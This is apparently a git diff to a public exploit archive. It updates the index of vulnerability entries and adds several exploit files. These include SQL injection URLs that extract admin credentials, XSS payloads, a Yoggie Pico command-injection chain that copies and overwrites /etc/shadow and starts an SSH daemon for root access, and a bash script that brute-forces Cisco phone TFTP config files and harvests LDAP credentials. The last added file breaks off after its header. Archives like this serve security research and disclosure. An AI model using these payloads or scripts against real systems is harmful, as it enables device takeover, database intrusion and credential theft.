diff --git a/files.csv b/files.csv
index c35cec951..429ab09cd 100755
--- a/files.csv
+++ b/files.csv
@@ -26833,7 +26833,7 @@ id,file,description,date,author,platform,type,port
 29878,platforms/php/webapps/29878.txt,"Allfaclassifieds 6.04 Level2.PHP Remote File Include Vulnerability",2007-04-23,Dr.RoVeR,php,webapps,0
 29879,platforms/php/webapps/29879.txt,"PHPMyBibli 1.32 Init.Inc.PHP Remote File Include Vulnerability",2007-04-23,MoHaNdKo,php,webapps,0
 29880,platforms/php/webapps/29880.txt,"File117 Multiple Remote File Include Vulnerabilities",2007-04-23,InyeXion,php,webapps,0
-29881,platforms/windows/local/29881.txt,"Adobe Acrobat Reader ASLR/DEP Bypass Exploit with SANDBOX BYPASS",2013-11-28,"w3bd3vil and abh1sek",windows,local,0
+29881,platforms/windows/local/29881.txt,"Adobe Acrobat Reader - ASLR/DEP Bypass Exploit with SANDBOX BYPASS",2013-11-28,"w3bd3vil and abh1sek",windows,local,0
 29882,platforms/php/webapps/29882.html,"PHPMySpace Gold 8.10 Article.PHP SQL Injection Vulnerability",2007-04-23,"John Martinelli",php,webapps,0
 29883,platforms/php/webapps/29883.txt,"ACVSWS Transport.PHP Remote File Include Vulnerability",2007-04-23,MoHaNdKo,php,webapps,0
 29884,platforms/multiple/remote/29884.txt,"Apple Quicktime <= 7.1.5 QTJava toQTPointer() Java Handling Arbitrary Code Execution Vulnerability",2007-04-23,"Shane Macaulay",multiple,remote,0
@@ -26955,19 +26955,19 @@ id,file,description,date,author,platform,type,port
 30005,platforms/php/webapps/30005.txt,"Campsite 2.6.1 LocalizerConfig.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
 30006,platforms/php/webapps/30006.txt,"Campsite 2.6.1 LocalizerLanguage.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
 30007,platforms/windows/local/30007.txt,"Notepad++ Plugin Notepad# 1.5 - Local Exploit",2013-12-03,"Junwen Sun",windows,local,0
-30008,platforms/java/remote/30008.rb,"Cisco Prime Data Center Network Manager Arbitrary File Upload",2013-12-03,metasploit,java,remote,0
+30008,platforms/java/remote/30008.rb,"Cisco Prime Data Center Network Manager - Arbitrary File Upload",2013-12-03,metasploit,java,remote,0
 30009,platforms/windows/remote/30009.rb,"ABB MicroSCADA wserver.exe - Remote Code Execution",2013-12-03,metasploit,windows,remote,12221
 30010,platforms/php/remote/30010.rb,"Kimai 0.9.2 - 'db_restore.php' SQL Injection",2013-12-03,metasploit,php,remote,80
 30011,platforms/windows/remote/30011.rb,"Microsoft Tagged Image File Format (TIFF) Integer Overflow",2013-12-03,metasploit,windows,remote,0
 30012,platforms/php/webapps/30012.txt,"Chamilo LMS 1.9.6 (profile.php, password0 param) - SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80
 30013,platforms/php/webapps/30013.txt,"Dokeos 2.2 RC2 (index.php, language param) - SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80
-30014,platforms/windows/local/30014.py,"Windows NDPROXY Local SYSTEM Privilege Escalation",2013-12-03,ryujin,windows,local,0
+30014,platforms/windows/local/30014.py,"Windows NDPROXY - Local SYSTEM Privilege Escalation",2013-12-03,ryujin,windows,local,0
 30015,platforms/php/webapps/30015.txt,"Advanced Guestbook 2.4.2 Lang Cookie Parameter Local File Include Vulnerability",2007-05-08,netVigilance,php,webapps,0
 30016,platforms/windows/remote/30016.txt,"Adobe RoboHelp Frameset-7.HTML Cross-Site Scripting Vulnerability",2007-05-08,"Michael Domberg",windows,remote,0
 30017,platforms/unix/local/30017.sh,"HP Tru64 5.0.1 DOP Command Local Privilege Escalation Vulnerability",2007-05-08,"Daniele Calore",unix,local,0
 30018,platforms/linux/remote/30018.py,"Python 2.5 PyLocale_strxfrm Function Remote Information Leak Vulnerability",2007-05-08,"Piotr Engelking",linux,remote,0
 30019,platforms/windows/remote/30019.c,"CA Multiple Products Console Server and InoCore.dll Remote Code Execution Vulnerabilities",2007-05-09,binagres,windows,remote,0
-30020,platforms/linux/dos/30020.txt,"MySQL 5.0.x IF Query Handling Remote Denial Of Service Vulnerability",2013-12-04,"Neil Kettle",linux,dos,0
+30020,platforms/linux/dos/30020.txt,"MySQL 5.0.x - IF Query Handling Remote Denial Of Service Vulnerability",2013-12-04,"Neil Kettle",linux,dos,0
 30021,platforms/solaris/local/30021.txt,"Sun Microsystems Solaris SRSEXEC 3.2.x Arbitrary File Read Local Information Disclosure Vulnerability",2007-05-10,Anonymous,solaris,local,0
 30022,platforms/php/webapps/30022.txt,"PHP Multi User Randomizer 2006.09.13 Configure_Plugin.TPL.PHP Cross-Site Scripting Vulnerability",2007-05-10,the_Edit0r,php,webapps,0
 30023,platforms/windows/dos/30023.txt,"Progress OpenEdge 10 b Multiple Denial Of Service Vulnerabilities",2007-05-11,"Eelko Neven",windows,dos,0
@@ -27089,7 +27089,7 @@ id,file,description,date,author,platform,type,port
 30152,platforms/php/webapps/30152.txt,"My Databook diary.php delete Parameter SQL Injection",2007-06-04,Serapis.net,php,webapps,0
 30153,platforms/php/webapps/30153.txt,"My Databook diary.php year Parameter XSS",2007-06-04,Serapis.net,php,webapps,0
 30154,platforms/windows/local/30154.pl,"GOM Player 2.2.53.5169 - SEH Buffer Overflow (.reg)",2013-12-09,"Mike Czumak",windows,local,0
-30155,platforms/php/webapps/30155.txt,"Wordpress TDO-Mini-Forms Plugin - Arbitrary File Upload Vulnerability",2013-12-09,"terminator ashiyane",php,webapps,0
+30155,platforms/php/webapps/30155.txt,"Wordpress TDO-Mini-Forms 0.13.9 Plugin - Arbitrary File Upload Vulnerability",2013-12-09,"terminator ashiyane",php,webapps,0
 30156,platforms/cgi/webapps/30156.txt,"CGILua <= 3.0 - SQL Injection",2013-12-09,"aceeeeeeeer .",cgi,webapps,0
 30157,platforms/php/webapps/30157.txt,"Joomla JD-Wiki 1.0.2 dwpage.php mosConfig_absolute_path Parameter Remote File Inclusion",2007-06-06,DarkbiteX,php,webapps,0
 30158,platforms/php/webapps/30158.txt,"Joomla JD-Wiki 1.0.2 wantedpages.php mosConfig_absolute_path Parameter Remote File Inclusion",2007-06-06,DarkbiteX,php,webapps,0
@@ -27121,11 +27121,10 @@ id,file,description,date,author,platform,type,port
 30189,platforms/jsp/webapps/30189.txt,"Apache Tomcat <= 6.0.13 JSP Example Web Applications Cross Site Scripting Vulnerability",2007-06-14,Anonymous,jsp,webapps,0
 30190,platforms/php/webapps/30190.txt,"Joomla! Letterman Subscriber Module 1.2.4 Mod_Lettermansubscribe.PHP Cross-Site Scripting Vulnerability",2007-06-14,"Edi Strosar",php,webapps,0
 30191,platforms/jsp/webapps/30191.txt,"Apache MyFaces Tomahawk JSF Framework 1.1.5 Autoscroll Parameter Cross Site Scripting Vulnerability",2007-06-14,"Rajat Swarup",jsp,webapps,0
-30192,platforms/windows/local/30192.txt,"Kaspersky Internet Security 6 SSDT Hooks Multiple Local Vulnerabilities",2007-06-15,"Matousec Transparent security",windows,local,0
+30192,platforms/windows/local/30192.txt,"Kaspersky Internet Security 6.0 - SSDT Hooks Multiple Local Vulnerabilities",2007-06-15,"Matousec Transparent security",windows,local,0
 30193,platforms/windows/dos/30193.html,"Apple Safari 3.0.1 for Windows Corefoundation.DLL Denial of Service Vulnerability",2007-06-16,Lostmon,windows,dos,0
 30194,platforms/windows/dos/30194.txt,"Apple Safari 3 for Windows Document.Location Denial of Service Vulnerability",2007-06-16,azizov,windows,dos,0
-30195,platforms/asp/webapps/30195.txt,"Webnet Studio - SQL Injection Vulnerability",2013-12-10,"a a",asp,webapps,0
-30196,platforms/windows/local/30196.py,"Mediacoder v0.8.0 (m3u) - Buffer Overflow Vulnerability",2013-12-10,"Return C",windows,local,0
+30196,platforms/windows/local/30196.py,"Mediacoder 0.8.0 (m3u) - Buffer Overflow Vulnerability",2013-12-10,"Return C",windows,local,0
 30197,platforms/php/webapps/30197.txt,"WSPortal 1.0 Content.PHP SQL Injection Vulnerability",2007-06-18,"Jesper Jurcenoks",php,webapps,0
 30198,platforms/asp/webapps/30198.txt,"TDizin Arama.ASP Cross-Site Scripting Vulnerability",2007-06-18,GeFORC3,asp,webapps,0
 30199,platforms/cgi/webapps/30199.txt,"WebIf OutConfig Parameter Local File Include Vulnerability",2007-06-18,maiosyet,cgi,webapps,0
@@ -27138,10 +27137,79 @@ id,file,description,date,author,platform,type,port
 30206,platforms/cfm/webapps/30206.txt,"FuseTalk <= 4.0 forum/include/common/comfinish.cfm FTVAR_SCRIPTRUN Parameter XSS",2007-06-20,"Ivan Almuina",cfm,webapps,0
 30207,platforms/asp/webapps/30207.txt,"FuseTalk <= 4.0 blog/include/common/comfinish.cfm FTVAR_SCRIPTRUN Parameter XSS",2007-06-20,"Ivan Almuina",asp,webapps,0
 30208,platforms/windows/dos/30208.txt,"IcoFX 2.5.0.0 (.ico) - Buffer Overflow Vulnerability",2013-12-11,"Core Security",windows,dos,0
-30209,platforms/windows/remote/30209.rb,"HP LoadRunner EmulationAdmin Web Service Directory Traversal",2013-12-11,metasploit,windows,remote,8080
-30210,platforms/multiple/remote/30210.rb,"Adobe ColdFusion 9 Administrative Login Bypass",2013-12-11,metasploit,multiple,remote,80
-30211,platforms/windows/remote/30211.txt,"EMC Data Protection Advisor DPA Illuminator EJBInvokerServlet RCE",2013-12-11,rgod,windows,remote,0
-30212,platforms/php/remote/30212.rb,"vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection",2013-12-11,metasploit,php,remote,80
-30213,platforms/php/webapps/30213.txt,"eFront v3.6.14 (build 18012) - Stored XSS in Multiple Parameters",2013-12-11,sajith,php,webapps,0
-30214,platforms/php/webapps/30214.txt,"Wordpress Skinizer Theme - Remote File Upload Vulnerability",2013-12-11,"terminator ashiyane",php,webapps,0
+30209,platforms/windows/remote/30209.rb,"HP LoadRunner EmulationAdmin - Web Service Directory Traversal",2013-12-11,metasploit,windows,remote,8080
+30210,platforms/multiple/remote/30210.rb,"Adobe ColdFusion 9 - Administrative Login Bypass",2013-12-11,metasploit,multiple,remote,80
+30211,platforms/windows/remote/30211.txt,"EMC Data Protection Advisor DPA Illuminator - EJBInvokerServlet RCE",2013-12-11,rgod,windows,remote,0
+30212,platforms/php/remote/30212.rb,"vBulletin 5 - index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection",2013-12-11,metasploit,php,remote,80
+30213,platforms/php/webapps/30213.txt,"eFront 3.6.14 (build 18012) - Stored XSS in Multiple Parameters",2013-12-11,sajith,php,webapps,0
 30215,platforms/hardware/webapps/30215.txt,"Photo Video Album Transfer 1.0 iOS - Multiple Vulnerabilities",2013-12-11,Vulnerability-Lab,hardware,webapps,0
+30216,platforms/cfm/webapps/30216.txt,"FuseTalk <= 4.0 AuthError.CFM Multiple Cross Site Scripting Vulnerabilities",2007-06-20,"Ivan Almuina",cfm,webapps,0
+30217,platforms/php/webapps/30217.txt,"Wrapper.PHP for OsCommerce Local File Include Vulnerability",2007-06-20,"Joe Bloomquist",php,webapps,0
+30218,platforms/multiple/remote/30218.txt,"BugHunter HTTP Server 1.6.2 Parse Error Information Disclosure Vulnerability",2007-06-20,Prili,multiple,remote,0
+30219,platforms/multiple/remote/30219.txt,"MyServer 0.8.9 Filename Parse Error Information Disclosure Vulnerability",2007-06-21,"Shay Priel",multiple,remote,0
+30220,platforms/php/webapps/30220.txt,"PHPAccounts 0.5 Index.PHP Local File Include Vulnerability",2007-06-21,r0t,php,webapps,0
+30221,platforms/php/webapps/30221.txt,"PHPAccounts 0.5 Index.PHP Multiple SQL Injection Vulnerabilities",2007-06-21,r0t,php,webapps,0
+30222,platforms/multiple/remote/30222.txt,"MyServer 0.9.8 Post.MSCGI Cross-Site Scripting Vulnerability",2007-01-02,Prili,multiple,remote,0
+30223,platforms/php/webapps/30223.txt,"NetClassifieds <= 1.9.7 Multiple Input Validation Vulnerabilities",2007-06-21,"Laurent Gaffie",php,webapps,0
+30224,platforms/windows/dos/30224.py,"Ingress Database Server 2.6 Multiple Remote Vulnerabilities",2007-06-21,Anonymous,windows,dos,0
+30225,platforms/php/webapps/30225.txt,"eNdonesia 8.4 mod.php viewarticle Action artid Parameter SQL Injection",2007-06-22,"Laurent Gaffie",php,webapps,0
+30226,platforms/php/webapps/30226.txt,"eNdonesia 8.4 banners.php click Action bid Parameter SQL Injection",2007-06-22,"Laurent Gaffie",php,webapps,0
+30227,platforms/php/webapps/30227.txt,"Joomla/Mambo Mod_Forum Component PHPBB_Root.PHP Remote File Include Vulnerability",2007-06-22,spymeta,php,webapps,0
+30228,platforms/osx/remote/30228.txt,"Apple WebCore XMLHTTPRequest Cross-Site Scripting Vulnerability",2007-06-22,"Richard Moore",osx,remote,0
+30229,platforms/multiple/remote/30229.txt,"SHTTPD 1.38 Filename Parse Error Information Disclosure Vulnerability",2007-06-25,"Shay Priel",multiple,remote,0
+30230,platforms/php/webapps/30230.txt,"MyNews 0.10 AuthACC SQL Injection Vulnerability",2007-06-25,netVigilance,php,webapps,0
+30231,platforms/multiple/remote/30231.txt,"Key Focus Web Server 3.1 Index.WKF Cross-Site Scripting Vulnerability",2007-06-25,"Shay Priel",multiple,remote,0
+30232,platforms/php/webapps/30232.txt,"Calendarix 0.7.20070307 Multiple Cross-Site Scripting Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps,0
+30233,platforms/windows/dos/30233.pl,"LiteWEB Web Server 2.7 Invalid Page Remote Denial of Service Vulnerability",2007-06-25,Prili,windows,dos,0
+30234,platforms/php/webapps/30234.txt,"Calendarix 0.7.20070307 Multiple SQL Injection Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps,0
+30235,platforms/php/webapps/30235.txt,"KikChat - (LFI/RCE) Multiple Vulnerability",2013-12-12,"Ramdan Yantu",php,webapps,0
+30237,platforms/hardware/local/30237.sh,"Cisco Unified Communications Manager - TFTP Service",2013-12-12,"daniel svartman",hardware,local,0
+30238,platforms/php/webapps/30238.txt,"Cythosia 2.x Botnet - SQL Injection Vulnerability",2013-12-12,GalaxyAndroid,php,webapps,0
+30239,platforms/php/webapps/30239.txt,"Wordpress Plugin SEM WYSIWYG - Remote File Upload Vulnerability",2013-12-12,"Great Cyrus",php,webapps,0
+30243,platforms/php/webapps/30243.txt,"Veno File Manager - Arbitrary File Download Vulnerability",2013-12-12,"Daniel Godoy",php,webapps,0
+30244,platforms/windows/local/30244.py,"Castripper 2.50.70 - (.pls) DEP Exploit",2013-12-12,"Morteza Hashemi",windows,local,0
+30245,platforms/hardware/webapps/30245.txt,"Phone Drive Eightythree 4.1.1 iOS - Multiple Vulnerabilities",2013-12-12,Vulnerability-Lab,hardware,webapps,0
+30246,platforms/php/webapps/30246.txt,"WHMCS v4.x & v5.x - Multiple Web Vulnerabilities",2013-12-12,"AhwAk20o0 --",php,webapps,0
+30247,platforms/php/webapps/30247.txt,"Telmanik CMS v1.01 - Multiple Web Vulnerabilities",2013-12-12,"JoKeR DZ",php,webapps,0
+30248,platforms/hardware/webapps/30248.txt,"Pentagram Cerberus P 6363 DSL Router - Multiple Vulnerabilities",2013-12-12,condis,hardware,webapps,0
+30249,platforms/php/webapps/30249.txt,"Papoo 1.0.3 Plugin.PHP Authentication Bypass Vulnerability",2007-06-27,"Nico Leidecker",php,webapps,0
+30250,platforms/asp/webapps/30250.txt,"DUClassmate 1.x ICity Parameter SQL Injection Vulnerability",2006-12-02,"Aria-Security Team",asp,webapps,0
+30251,platforms/linux/dos/30251.c,"GD Graphics Library <= 2.0.34 (libgd) gdImageCreateXbm Function Unspecified DoS",2007-06-26,Anonymous,linux,dos,0
+30252,platforms/windows/dos/30252.py,"Conti FTP Server 1.0 Large String Denial of Service Vulnerability",2007-06-27,35c666,windows,dos,0
+30253,platforms/php/webapps/30253.txt,"ETicket 1.5.5 Open.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-06-27,"Jesper Jurcenoks",php,webapps,0
+30254,platforms/hardware/remote/30254.txt,"Linksys Wireless-G ADSL Gateway WAG54GS 1.0.6 Setup.CGI Cross-Site Scripting Vulnerabilities",2007-06-27,"Petko Petkov",hardware,remote,0
+30255,platforms/windows/dos/30255.txt,"PC SOFT WinDEV 11 WDP File Parsing Stack Buffer Overflow Vulnerability",2007-06-28,"Jerome Athias",windows,dos,0
+30256,platforms/multiple/remote/30256.txt,"Oracle Rapid Install Web Server Secondary Login Page Cross Site Scripting Vulnerability",2007-06-28,"Kaushal Desai",multiple,remote,0
+30257,platforms/windows/remote/30257.html,"HP Instant Support ActiveX Control Driver Check Buffer Overflow Vulnerability",2007-04-01,"John Heasman",windows,remote,0
+30258,platforms/php/webapps/30258.txt,"LightBlog <= 5 Add_Comment.PHP Cross-Site Scripting Vulnerability",2007-07-02,Serapis.net,php,webapps,0
+30259,platforms/php/webapps/30259.txt,"Claroline <= 1.8.3 $_SERVER['PHP_SELF'] Parameter Multiple Cross-Site Scripting Vulnerabilities",2007-07-02,munozferna,php,webapps,0
+30260,platforms/cgi/webapps/30260.txt,"Yoggie Pico and Pico Pro Backticks Remote Code Execution Vulnerability",2007-07-02,"Cody Brocious",cgi,webapps,0
+30261,platforms/php/webapps/30261.txt,"Moodle 1.7.1 Index.PHP Cross Site Scripting Vulnerability",2007-07-02,MustLive,php,webapps,0
+30262,platforms/php/webapps/30262.txt,"Liesbeth Base CMS Information Disclosure Vulnerability",2007-07-02,durito,php,webapps,0
+30263,platforms/cgi/webapps/30263.txt,"Oliver Multiple Cross-Site Scripting Vulnerabilities",2007-07-03,"A. R.",cgi,webapps,0
+30264,platforms/multiple/remote/30264.txt,"Fujitsu ServerView <= 4.50.8 DBASCIIAccess Remote Command Execution Vulnerability",2007-07-03,"RedTeam Pentesting GmbH",multiple,remote,0
+30265,platforms/multiple/remote/30265.txt,"SAP Message Server Group Parameter Remote Buffer Overflow Vulnerability",2007-07-05,"Mark Litchfield",multiple,remote,0
+30266,platforms/jsp/webapps/30266.txt,"NetFlow Analyzer 5 /jspui/applicationList.jsp alpha Parameter XSS",2007-07-04,Lostmon,jsp,webapps,0
+30267,platforms/jsp/webapps/30267.txt,"NetFlow Analyzer 5 /jspui/appConfig.jsp task Parameter XSS",2007-07-04,Lostmon,jsp,webapps,0
+30268,platforms/jsp/webapps/30268.txt,"NetFlow Analyzer 5 netflow/jspui/index.jsp view Parameter XSS",2007-07-04,Lostmon,jsp,webapps,0
+30269,platforms/jsp/webapps/30269.txt,"NetFlow Analyzer 5 /jspui/selectDevice.jsp rtype Parameter XSS",2007-07-04,Lostmon,jsp,webapps,0
+30270,platforms/jsp/webapps/30270.txt,"NetFlow Analyzer 5 /jspui/customReport.jsp rtype Parameter XSS",2007-07-04,Lostmon,jsp,webapps,0
+30271,platforms/java/webapps/30271.txt,"OpManager 6/7 ping.do name Parameter XSS",2007-07-04,Lostmon,java,webapps,0
+30272,platforms/java/webapps/30272.txt,"OpManager 6/7 traceRoute.do name Parameter XSS",2007-07-04,Lostmon,java,webapps,0
+30273,platforms/java/webapps/30273.txt,"OpManager 6/7 reports/ReportViewAction.do Multiple Parameter XSS",2007-07-04,Lostmon,java,webapps,0
+30274,platforms/java/webapps/30274.txt,"OpManager 6/7 admin/ServiceConfiguration.do operation Parameter XSS",2007-07-04,Lostmon,java,webapps,0
+30275,platforms/java/webapps/30275.txt,"OpManager 6/7 admin/DeviceAssociation.do Multiple Parameter XSS",2007-07-04,Lostmon,java,webapps,0
+30276,platforms/java/webapps/30276.txt,"OpManager 6/7 map/traceRoute.do name Parameter XSS",2007-07-04,Lostmon,java,webapps,0
+30277,platforms/php/webapps/30277.txt,"Maia Mailguard 1.0.2 Login.PHP Multiple Local File Include Vulnerabilities",2007-07-05,"Adriel T. Desautels",php,webapps,0
+30278,platforms/windows/remote/30278.c,"SAP DB 7.x Web Server WAHTTP.EXE Multiple Buffer Overflow Vulnerabilities",2007-07-05,"Mark Litchfield",windows,remote,0
+30279,platforms/multiple/remote/30279.txt,"SAP Internet Graphics Server <= 7.0 PARAMS Cross Site Scripting Vulnerability",2007-07-05,"Mark Litchfield",multiple,remote,0
+30280,platforms/linux/local/30280.txt,"GFax 0.7.6 Temporary Files Local Arbitrary Command Execution Vulnerability",2007-07-05,"Steve Kemp",linux,local,0
+30281,platforms/windows/remote/30281.txt,"Microsoft .Net Framework <= 2.0 Multiple Null Byte Injection Vulnerabilities",2007-07-06,"Paul Craig",windows,remote,0
+30282,platforms/asp/webapps/30282.txt,"Levent Veysi Portal 1.0 Oku.ASP SQL Injection Vulnerability",2007-07-07,GeFORC3,asp,webapps,0
+30283,platforms/php/webapps/30283.txt,"SquirrelMail G/PGP Encryption Plug-in 2.0/2.1 Multiple Unspecified Remote Command Execution Vulnerabilities",2007-07-09,"Stefan Esser",php,webapps,0
+30284,platforms/linux/remote/30284.vbs,"Sun Java Runtime Environment 1.6 Web Start JNLP File Stack Buffer Overflow Vulnerability",2007-07-09,"Daniel Soeder",linux,remote,0
+30285,platforms/linux/remote/30285.txt,"Microsoft Internet Explorer and Mozilla Firefox URI Handler Command Injection Vulnerability",2007-07-10,"Thor Larholm",linux,remote,0
+30286,platforms/linux/remote/30286.txt,"ImgSvr 0.6 Template Parameter Local File Include Vulnerability",2007-07-10,"Tim Brown",linux,remote,0
+30287,platforms/windows/remote/30287.txt,"TippingPoint IPS Unicode Character Detection Bypass Vulnerability",2007-07-10,Security-Assessment.com,windows,remote,0
+30288,platforms/multiple/remote/30288.txt,"Adobe Flash Player <= 8.0.24 SWF File Handling Remote Code Execution Vulnerability",2007-07-10,"Stefano DiPaola",multiple,remote,0
+30289,platforms/asp/webapps/30289.txt,"EnViVo!CMS Default.ASP ID Parameter SQL Injection Vulnerability",2007-07-11,durito,asp,webapps,0
diff --git a/platforms/asp/webapps/30195.txt b/platforms/asp/webapps/30195.txt
deleted file mode 100755
index f52da411a..000000000
--- a/platforms/asp/webapps/30195.txt
+++ /dev/null
@@ -1,20 +0,0 @@
-#********************************************************************************
-# Exploit Title : Webnet Studio Sql Injection Vulnerability
-#
-# Exploit Author : Ashiyane Digital Security Team
-#
-# Vendor Homepage : http://www.webnetstudio.it
-#
-# Google Dork : intext:"powered by Webnet Studio"
-#
-# Date: 2013-12-10
-#
-# Tested on: Windows 7 , Linux
-#
-# discovered by : ACC3SS
--------------------------------------------------------------------
-# Exploit : Sql Injection
-#
-# Location : [Target]/content.asp?ID=[Sql Injection]
-#
-######################
\ No newline at end of file
diff --git a/platforms/asp/webapps/30250.txt b/platforms/asp/webapps/30250.txt
new file mode 100755
index 000000000..8f6e5d31b
--- /dev/null
+++ b/platforms/asp/webapps/30250.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/24637/info
+
+DUClassmate is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+http://www.example.com/default.asp?iCity=[SQL Injection] 
\ No newline at end of file
diff --git a/platforms/asp/webapps/30282.txt b/platforms/asp/webapps/30282.txt
new file mode 100755
index 000000000..9f6558ec8
--- /dev/null
+++ b/platforms/asp/webapps/30282.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24794/info
+
+Levent Veysi Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+An attacker can exploit this issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
+
+This issue affects Levent Veysi Portal 1.0; other versions may also be affected. 
+
+http://www.example.com/script_path/oku.asp?id=-1+union+select+0,1,kullaniciadi,sifre+from+admin 
\ No newline at end of file
diff --git a/platforms/asp/webapps/30289.txt b/platforms/asp/webapps/30289.txt
new file mode 100755
index 000000000..a2b28718e
--- /dev/null
+++ b/platforms/asp/webapps/30289.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24860/info
+
+enVivo!CMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+All versions are considered vulnerable to this issue.
+
+http://www.example.com/default.asp?action=article&ID=-1+or+1=(SELECT+TOP+1+username+from+users)-- 
\ No newline at end of file
diff --git a/platforms/cfm/webapps/30216.txt b/platforms/cfm/webapps/30216.txt
new file mode 100755
index 000000000..c4dc13859
--- /dev/null
+++ b/platforms/cfm/webapps/30216.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/24564/info
+
+FuseTalk is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/forum/include/error/autherror.cfm?errorcode=1
+&FTVAR_LINKP=[xss]
+
+http://www.example.com/blog/forum/include/error/autherror.cfm?errorcode=1
+&FTVAR_URLP=[xss] 
\ No newline at end of file
diff --git a/platforms/cgi/webapps/30260.txt b/platforms/cgi/webapps/30260.txt
new file mode 100755
index 000000000..283bb5e0a
--- /dev/null
+++ b/platforms/cgi/webapps/30260.txt
@@ -0,0 +1,32 @@
+source: http://www.securityfocus.com/bid/24743/info
+
+Yoggie Pico and Pico Pro are prone to a remote code-execution vulnerability because the device fails to sufficiently sanitize user-supplied input.
+
+An attacker can exploit this issue to execute arbitrary code with superuser privileges. A successful exploit will result in the complete compromise of affected devices. 
+
+When run from a machine with a Yoggie Pico Pro connected,
+yoggie.yoggie.com resolves to the IP of the device, so these links
+will of course not work unless you have a device connected.  I didn't
+brute-force the root password, so I explain how you can replace their
+/etc/shadow to set the password to whatever you choose.
+
+To access the original /etc/shadow:
+https://yoggie.yoggie.com:8443/cgi-bin/runDiagnostics.cgi?command=Ping&param=%60cp%20/etc/shadow%20shadow.txt%60
+https://yoggie.yoggie.com:8443/cgi-bin/shadow.txt
+Replace the root password with the password of your choosing, then
+wrap the file in single quotes and urlencode the entire string.
+
+To replace the original /etc/shadow with your own:
+https://yoggie.yoggie.com:8443/cgi-bin/runDiagnostics.cgi?command=Ping&param=%60echo%20<urlencoded
+shadow file>%20%3E%20/etc/shadow%60
+
+Finally, running dropbear sshd on port 7290 (random choice -- not
+blocked by their firewall rules)
+https://yoggie.yoggie.com:8443/cgi-bin/runDiagnostics.cgi?command=Ping&param=%60/usr/sbin/dropbear%20-p%207290%60
+
+Log in as root with the password chosen, and you now have complete
+control over the device.  It's quite  powerful little computer, and a
+whole hell of a lot of fun to play around with.  A word of advice,
+though -- don't touch libc in any way, shape, or form, as there's no
+reflash mechanism I've found on the device, which is why I now have a
+bricked pico pro sitting on my desk ;)
diff --git a/platforms/cgi/webapps/30263.txt b/platforms/cgi/webapps/30263.txt
new file mode 100755
index 000000000..126067d78
--- /dev/null
+++ b/platforms/cgi/webapps/30263.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/24754/info
+
+Oliver is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.example.com/oliver/gateway/gateway.exe?X_=000f&application=Oliver&displayform=main&updateform="><script>alert("XSS");</script> http://www.example.com/oliver/gateway/gateway.exe?X_=000f&displayform=main"><script>alert("XSS");</script> 
\ No newline at end of file
diff --git a/platforms/hardware/local/30237.sh b/platforms/hardware/local/30237.sh
new file mode 100755
index 000000000..728ad27d7
--- /dev/null
+++ b/platforms/hardware/local/30237.sh
@@ -0,0 +1,42 @@
+#!/bin/bash
+#######################################################################
+# Proof of Concept on how to get tftp config files from cisco phones  #
+# This can be performed anonymously and privileges gathered relies on #
+# those assigned to the ldap account                                  #
+# Developed by Daniel Svartman  (danielsvartman@gmail.com             #
+# In case tftp files are encrypted, you will need to hijack a phone   #
+# and download the decryption key from the ROM memory                 #
+#######################################################################                               
+
+# This example below is for enumerating and downloading configuration files from phones
+# With this you can gather personal information and sometimes also credentials from LDAP
+# The first 8 digits of the MAC address relies on cisco mac address used by phones
+# While the last 4 are generated automatically
+
+BASE_MAC=$1
+TFTP_SERVER=$2
+
+perl -e '$var = 0x0001; for (1 .. 65535 ) { printf qq[%04X\n], $var++ }' > mac.txt
+
+#Now we should download the files
+while read LINE; do
+	tftp ${TFTP_SERVER} -c get SEP${BASE_MAC}${LINE}.cnf.xml
+done < mac.txt
+
+#Finally, we download and process also the SPDefault.cnf.xml file
+tftp ${TFTP_SERVER} -c get SPDefault.cnf.xml
+USERID=`grep "UseUserCredential"  SPDefault.cnf.xml | cut -d ">" -f 6 | cut -d "<" -f 1`
+echo "USERID: " $USERID > credentials.txt
+PWD=`grep "UseUserCredential" SPDefault.cnf.xml | cut -d ">" -f 8 | cut -d "<" -f 1`
+echo "PWD: " $PWD >> credentials.txt
+BASE_DN=`grep "UseUserCredential" SPDefault.cnf.xml | cut -d ">" -f 10 | cut -d "<" -f 1`
+echo "BASE_DN: " $BASE_DN >> credentials.txt
+while read LINE; do	
+			if [ "$LINE" = "<ProductType>Directory" ]; then
+				read LINE
+				ADDRESS=`echo $LINE | cut -d ">" -f 2 | cut -d "<" -f 1`
+				echo "LDAP_IP_ADDRESS: " $ADDRESS >> credentials.txt
+			fi
+done < SPDefault.cnf.xml
+
+echo "Done - Please, check credentials.txt file, also review all the SEPxxxx.cnf.xml files for further credentials"
\ No newline at end of file
diff --git a/platforms/hardware/remote/30254.txt b/platforms/hardware/remote/30254.txt
new file mode 100755
index 000000000..940af08a6
--- /dev/null
+++ b/platforms/hardware/remote/30254.txt
@@ -0,0 +1,13 @@
